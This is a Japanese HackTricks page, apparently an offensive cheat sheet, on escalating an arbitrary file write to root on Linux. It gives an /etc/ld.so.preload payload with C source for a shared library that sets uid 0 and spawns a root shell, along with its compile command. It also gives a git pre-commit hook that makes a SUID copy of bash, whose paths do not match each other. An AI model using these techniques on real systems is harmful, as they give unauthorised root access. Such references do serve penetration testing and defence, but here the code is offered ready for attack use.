Arbitrary File Write to Root

htARTE（HackTricks AWS Red Team Expert） でAWSハッキングをゼロからヒーローまで学びましょう！

HackTricks をサポートする他の方法:

HackTricks で企業を宣伝したい または HackTricks をPDFでダウンロードしたい 場合は SUBSCRIPTION PLANS をチェックしてください！
公式PEASS＆HackTricksのグッズを入手する
The PEASS Family を発見し、独占的な NFTs のコレクションを見つける
💬 Discordグループ に参加するか、telegramグループ に参加するか、Twitter 🐦 @carlospolopm をフォローする.**
ハッキングトリックを共有するために HackTricks と HackTricks Cloud のGitHubリポジトリにPRを提出する。

/etc/ld.so.preload

このファイルは LD_PRELOAD 環境変数のように振る舞いますが、SUID バイナリ でも機能します。作成または変更できれば、実行されるバイナリごとに ロードされるライブラリへのパス を追加することができます。

例: echo "/tmp/pe.so" > /etc/ld.so.preload

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unlink("/etc/ld.so.preload");
setgid(0);
setuid(0);
system("/bin/bash");
}
//cd /tmp
//gcc -fPIC -shared -o pe.so pe.c -nostartfiles

Git フック

Git フックは、コミットが作成されたとき、マージが行われたときなど、gitリポジトリでさまざまなイベントで実行されるスクリプトです。したがって、特権のあるスクリプトまたはユーザーがこれらのアクションを頻繁に実行し、.gitフォルダに書き込むことが可能であれば、これを特権昇格に利用できます。

たとえば、新しいコミットが作成されるたびに常に実行されるように、gitリポジトリ内の.git/hooksにスクリプトを生成することが可能です：

```bash echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/0xdf\nchown root:root /tmp/0xdf\nchmod 4777 /tmp/b' > pre-commit chmod +x pre-commit ``` ### Cron & Time files

TODO

Service & Socket files

TODO

binfmt_misc

/proc/sys/fs/binfmt_miscにあるファイルは、どのバイナリがどの種類のファイルを実行するかを示しています。これを悪用して、一般的なファイルタイプが開かれたときに逆シェルを実行する方法を調査してください。

PreviousLinux Privilege Escalation NextCisco - vmanage

Last updated 1 month ago